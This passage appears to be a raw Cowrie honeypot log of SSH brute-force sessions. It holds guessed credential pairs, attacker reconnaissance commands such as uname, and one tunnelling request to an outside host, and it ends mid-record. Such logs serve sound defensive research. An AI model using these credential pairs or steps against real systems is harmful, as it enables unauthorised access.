{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:51.650055Z","src_ip":"212.227.235.229","session":"ff046397d4de"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:03:52.444594Z","src_ip":"212.227.235.229","session":"ff046397d4de"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:03:53.711587Z","src_ip":"212.227.235.229","session":"ff046397d4de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45910,"dst_ip":"1.2.3.4","dst_port":22,"session":"fafa37a52959","protocol":"ssh","message":"New connection: 212.227.125.160:45910 (1.2.3.4:22) [session: fafa37a52959]","sensor":"my-vps","timestamp":"2025-08-31T03:03:56.556879Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:03:57.700424Z","src_ip":"212.227.125.160","session":"fafa37a52959"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:03:57.701774Z","src_ip":"212.227.125.160","session":"fafa37a52959"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-31T03:04:00.219949Z","src_ip":"212.227.125.160","session":"d47205c59f2f"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49738,"dst_ip":"1.2.3.4","dst_port":22,"session":"c01c93f5c985","protocol":"ssh","message":"New connection: 41.226.27.251:49738 (1.2.3.4:22) [session: c01c93f5c985]","sensor":"my-vps","timestamp":"2025-08-31T03:04:03.303311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:03.357162Z","src_ip":"41.226.27.251","session":"c01c93f5c985"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:04:03.358262Z","src_ip":"41.226.27.251","session":"c01c93f5c985"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:04:03.552674Z","src_ip":"41.226.27.251","session":"c01c93f5c985"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:04:03.665930Z","src_ip":"41.226.27.251","session":"c01c93f5c985"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:04:03.666618Z","src_ip":"41.226.27.251","session":"c01c93f5c985"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:03.716608Z","src_ip":"41.226.27.251","session":"c01c93f5c985"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:03.717709Z","src_ip":"41.226.27.251","session":"c01c93f5c985"}
{"eventid":"cowrie.login.success","username":"root","password":"OABmg141211","message":"login attempt [root/OABmg141211] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:04:04.530471Z","src_ip":"212.227.125.160","session":"fafa37a52959"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:04:07.339886Z","src_ip":"212.227.125.160","session":"fafa37a52959"}
{"eventid":"cowrie.command.input","input":"history | tail -5","message":"CMD: history | tail -5","sensor":"my-vps","timestamp":"2025-08-31T03:04:07.340578Z","src_ip":"212.227.125.160","session":"fafa37a52959"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","size":28,"shasum":"3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/3b6409aecd4af0f82f5af0e783a29453ca4bca7e2fda26224a53d480b46ae991 after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:08.684164Z","src_ip":"212.227.125.160","session":"fafa37a52959"}
{"eventid":"cowrie.session.closed","duration":"12.1","message":"Connection lost after 12.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:08.685279Z","src_ip":"212.227.125.160","session":"fafa37a52959"}
{"eventid":"cowrie.session.closed","duration":"35.8","message":"Connection lost after 35.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:14.798128Z","src_ip":"212.227.125.160","session":"d47205c59f2f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60828,"dst_ip":"1.2.3.4","dst_port":22,"session":"479b4b3704e0","protocol":"ssh","message":"New connection: 212.227.235.229:60828 (1.2.3.4:22) [session: 479b4b3704e0]","sensor":"my-vps","timestamp":"2025-08-31T03:04:15.728443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:19.244102Z","src_ip":"212.227.235.229","session":"479b4b3704e0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:04:19.244868Z","src_ip":"212.227.235.229","session":"479b4b3704e0"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":53902,"dst_ip":"1.2.3.4","dst_port":22,"session":"55a294bafcf9","protocol":"ssh","message":"New connection: 201.148.180.50:53902 (1.2.3.4:22) [session: 55a294bafcf9]","sensor":"my-vps","timestamp":"2025-08-31T03:04:20.563430Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42688,"dst_ip":"1.2.3.4","dst_port":22,"session":"f52d7a70ca90","protocol":"ssh","message":"New connection: 212.227.235.229:42688 (1.2.3.4:22) [session: f52d7a70ca90]","sensor":"my-vps","timestamp":"2025-08-31T03:04:21.520609Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:21.684976Z","src_ip":"201.148.180.50","session":"55a294bafcf9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:04:21.687706Z","src_ip":"201.148.180.50","session":"55a294bafcf9"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:22.451001Z","src_ip":"212.227.235.229","session":"f52d7a70ca90"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:04:22.452177Z","src_ip":"212.227.235.229","session":"f52d7a70ca90"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":55496,"dst_ip":"1.2.3.4","dst_port":22,"session":"24563c485a79","protocol":"ssh","message":"New connection: 41.226.27.251:55496 (1.2.3.4:22) [session: 24563c485a79]","sensor":"my-vps","timestamp":"2025-08-31T03:04:23.917441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:23.918345Z","src_ip":"41.226.27.251","session":"24563c485a79"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:04:23.963643Z","src_ip":"41.226.27.251","session":"24563c485a79"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"1qaz@WSX","message":"login attempt [oracle/1qaz@WSX] failed","sensor":"my-vps","timestamp":"2025-08-31T03:04:24.100063Z","src_ip":"41.226.27.251","session":"24563c485a79"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:25.299865Z","src_ip":"41.226.27.251","session":"24563c485a79"}
{"eventid":"cowrie.login.success","username":"root","password":"OABmg141211","message":"login attempt [root/OABmg141211] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:04:27.666293Z","src_ip":"201.148.180.50","session":"55a294bafcf9"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"root123","message":"login attempt [ftpuser/root123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:04:28.221404Z","src_ip":"212.227.235.229","session":"f52d7a70ca90"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:29.952187Z","src_ip":"212.227.235.229","session":"f52d7a70ca90"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:04:31.976282Z","src_ip":"201.148.180.50","session":"55a294bafcf9"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-31T03:04:31.977123Z","src_ip":"201.148.180.50","session":"55a294bafcf9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:33.338752Z","src_ip":"201.148.180.50","session":"55a294bafcf9"}
{"eventid":"cowrie.session.closed","duration":"12.8","message":"Connection lost after 12.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:33.339822Z","src_ip":"201.148.180.50","session":"55a294bafcf9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56404,"dst_ip":"1.2.3.4","dst_port":22,"session":"b221d4ad5dbb","protocol":"ssh","message":"New connection: 212.227.235.229:56404 (1.2.3.4:22) [session: b221d4ad5dbb]","sensor":"my-vps","timestamp":"2025-08-31T03:04:36.887226Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:04:36.888337Z","src_ip":"212.227.235.229","session":"b221d4ad5dbb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56701,"dst_ip":"1.2.3.4","dst_port":22,"session":"1faf702588ba","protocol":"ssh","message":"New connection: 212.227.235.229:56701 (1.2.3.4:22) [session: 1faf702588ba]","sensor":"my-vps","timestamp":"2025-08-31T03:04:37.074557Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:37.075511Z","src_ip":"212.227.235.229","session":"1faf702588ba"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T03:04:37.234515Z","src_ip":"212.227.235.229","session":"1faf702588ba"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:04:37.716712Z","src_ip":"212.227.235.229","session":"1faf702588ba"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T03:04:37.876923Z","session":"1faf702588ba"}
{"eventid":"cowrie.login.failed","username":"apache","password":"apache","message":"login attempt [apache/apache] failed","sensor":"my-vps","timestamp":"2025-08-31T03:04:41.387312Z","src_ip":"212.227.235.229","session":"479b4b3704e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60850,"dst_ip":"1.2.3.4","dst_port":22,"session":"08937820efbb","protocol":"ssh","message":"New connection: 212.227.125.160:60850 (1.2.3.4:22) [session: 08937820efbb]","sensor":"my-vps","timestamp":"2025-08-31T03:04:42.451124Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54342,"dst_ip":"1.2.3.4","dst_port":22,"session":"f69620544d6e","protocol":"ssh","message":"New connection: 212.227.125.160:54342 (1.2.3.4:22) [session: f69620544d6e]","sensor":"my-vps","timestamp":"2025-08-31T03:04:42.690729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:04:42.911644Z","src_ip":"212.227.125.160","session":"08937820efbb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha